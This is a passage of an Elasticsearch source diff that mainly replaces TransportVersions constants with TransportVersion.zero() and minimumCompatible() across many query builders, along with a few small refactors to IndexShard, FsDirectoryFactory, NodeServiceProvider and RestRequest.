getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java index 845023d2d832d..62ae71a8276e8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeometryParser; import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.geo.SpatialStrategy; @@ -268,6 +267,6 @@ public static GeoShapeQueryBuilder fromXContent(XContentParser parser) throws IO @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java index bfaeca31730b9..fbb905b702293 100644 --- a/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java @@ -158,6 +158,6 @@ protected boolean doEquals(IdsQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java index 0731eef5bfe35..8a62e1d2856b5 100644 --- a/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -154,6 +153,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java index 70e417db54f28..79747acf3ea12 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -85,6 +84,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java index 4ec6f870bf646..38a942be4942f 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -377,6 +376,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java index 4dd926a1b9d39..42d948e7b0cef 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java @@ -117,6 +117,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java index 139d5c2c2a2e6..2e648652fab63 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -286,6 +285,6 @@ public static MatchPhrasePrefixQueryBuilder fromXContent(XContentParser parser) @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java index 86f5988135d79..f943df4b76810 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.analysis.core.KeywordAnalyzer; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -293,6 +292,6 @@ public static MatchPhraseQueryBuilder fromXContent(XContentParser parser) throws @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java index fd704d39ca384..56e002287e1e3 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java @@ -568,6 +568,6 @@ public static MatchQueryBuilder fromXContent(XContentParser parser) throws IOExc @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java index 54dab4f9716f0..4b2f4f2517622 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java @@ -1128,6 +1128,6 @@ protected QueryBuilder doRewrite(QueryRewriteContext queryRewriteContext) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java index cfd2fdcda853c..df7f28a7a15d5 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java @@ -823,6 +823,6 @@ protected boolean doEquals(MultiMatchQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java index 34c5ede62a656..2415db9348eac 100644 --- a/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java @@ -26,7 +26,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.search.MaxScoreCollector; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; @@ -489,6 +488,6 @@ public TopDocsAndMaxScore topDocs(SearchHit hit) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java index 381245ab20974..9b5c72af97bc4 100644 --- a/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -259,6 +258,6 @@ protected boolean doEquals(PrefixQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java index c4a7a8f57cef4..7efab50956cc2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.automaton.Operations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -972,6 +971,6 @@ protected Query doToQuery(SearchExecutionContext context) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java index d6dad15abb8e6..c1787cf0a84cc 100644 --- a/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.ShapeRelation; @@ -558,6 +557,6 @@ protected boolean doEquals(RangeQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java index ff3d63d4c2549..1a0833693ad77 100644 --- a/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.util.automaton.Operations; import org.apache.lucene.util.automaton.RegExp; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -321,6 +320,6 @@ protected boolean doEquals(RegexpQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java index 8d3fd1d92e1e7..faf01731947fe 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java @@ -23,7 +23,6 @@ import org.apache.lucene.search.Weight; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -229,6 +228,6 @@ protected boolean doEquals(ScriptQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java index b366309be66bb..0421536a69a36 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java @@ -633,6 +633,6 @@ protected boolean doEquals(SimpleQueryStringBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java index f146d9d4c860e..40210ef19ac64 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,6 +167,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java index 7d72649ff1080..42969e3991d44 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -163,6 +162,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java index 659f633aab286..2ee65be907e9e 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.TopTermsRewrite; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -190,6 +189,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java index 458ff598737fa..f65ca20a96960 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -277,7 +276,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** @@ -373,7 +372,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java index 007fa27bbf8fa..761484cd5cfc7 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -265,6 +264,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java index 09a4a56df6025..f56013b6570e8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,6 +167,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java index 20874a736b1ec..c2b094325ae57 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.QueryVisitor; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.index.mapper.MappedFieldType; @@ -160,6 +159,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java index bac7f5aeec226..9024b049f35bc 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanWithinQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -177,6 +176,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java index 3b2a444e3fc7b..ccb7b0cc28c0b 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -235,6 +234,6 @@ protected final boolean doEquals(TermQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java index dec4090a3e6bd..f0d1c08321bb2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.client.internal.Client; @@ -550,6 +549,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java index a6116ccf2c495..b12b417e24aa8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java @@ -480,6 +480,6 @@ public LongValuesSource rewrite(IndexSearcher searcher) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java index fed6c3df15587..2d100efd7858f 100644 --- a/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java @@ -56,6 +56,13 @@ public class WildcardQueryBuilder extends AbstractQueryBuilder inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java b/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java index 2c14f978a8b57..11fbcaf2c459c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.index.query.functionscore; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.function.ScoreFunction; @@ -60,7 +59,7 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java b/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java index 76ecd8141f79d..8dc7440c5dccf 100644 --- a/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java +++ b/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java @@ -1366,11 +1366,12 @@ public RefreshStats refreshStats() { } public FlushStats flushStats() { + final Engine engine = getEngineOrNull(); return new FlushStats( flushMetric.count(), periodicFlushMetric.count(), TimeUnit.NANOSECONDS.toMillis(flushMetric.sum()), - getEngineOrNull() != null ? getEngineOrNull().getTotalFlushTimeExcludingWaitingOnLockInMillis() : 0L + engine != null ? engine.getTotalFlushTimeExcludingWaitingOnLockInMillis() : 0L ); } diff --git a/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java b/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java index d4ec647b992b5..39a5c03e27942 100644 --- a/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java +++ b/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java @@ -46,7 +46,6 @@ public class FsDirectoryFactory implements IndexStorePlugin.DirectoryFactory { private static final Logger Log = LogManager.getLogger(FsDirectoryFactory.class); private static final FeatureFlag MADV_RANDOM_FEATURE_FLAG = new FeatureFlag("madv_random"); - private static final FeatureFlag TMP_FDT_NO_MMAP_FEATURE_FLAG = new FeatureFlag("tmp_fdt_no_mmap"); public static final Setting INDEX_LOCK_FACTOR_SETTING = new Setting<>("index.store.fs.fs_lock", "native", (s) -> { return switch (s) { @@ -261,8 +260,7 @@ static boolean useDelegate(String name, IOContext ioContext) { * @return whether to avoid using delegate if the file is a tmp fdt file. */ static boolean avoidDelegateForFdtTempFiles(String name, LuceneFilesExtensions extension) { - // NOTE, for now gated behind feature flag to observe impact of this change in benchmarks only: - return TMP_FDT_NO_MMAP_FEATURE_FLAG.isEnabled() && extension == LuceneFilesExtensions.TMP && name.contains("fdt"); + return extension == LuceneFilesExtensions.TMP && name.contains("fdt"); } MMapDirectory getDelegate() { diff --git a/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java b/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java index 325a6b22b62c7..9c0b1eb8ac505 100644 --- a/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java +++ b/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.ingest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -63,7 +62,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public Map getPipelines() { @@ -150,7 +149,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java b/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java index 53c26dc679677..ba1ca445642b6 100644 --- a/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java +++ b/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java @@ -116,7 +116,7 @@ TransportService newTransportService( TaskManager taskManager, Tracer tracer ) { - return new TransportService(settings, transport, threadPool, interceptor, localNodeFactory, clusterSettings, taskManager, tracer); + return new TransportService(settings, transport, threadPool, interceptor, localNodeFactory, clusterSettings, taskManager); } HttpServerTransport newHttpTransport(PluginsService pluginsService, NetworkModule networkModule) { diff --git a/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java b/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java index 03089cdff7cc2..e9a81d5baae66 100644 --- a/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java +++ b/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.persistent; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -121,7 +120,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java b/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java index 75ebc08004ddb..3e561432e139d 100644 --- a/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java +++ b/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java @@ -9,7 +9,6 @@ package org.elasticsearch.persistent; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -110,7 +109,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/rest/RestRequest.java b/server/src/main/java/org/elasticsearch/rest/RestRequest.java index 54ad500a9144d..068d4879603e0 100644 --- a/server/src/main/java/org/elasticsearch/rest/RestRequest.java +++ b/server/src/main/java/org/elasticsearch/rest/RestRequest.java @@ -329,16 +329,20 @@ public HttpBody.Stream contentStream() { return httpRequest.body().asStream(); } - /** - * Returns reference to the network buffer of HTTP content or throw an exception if the body or content type is missing. - * See {@link #content()}. - */ - public ReleasableBytesReference requiredContent() { + public void ensureContent() { if (hasContent() == false) { throw new 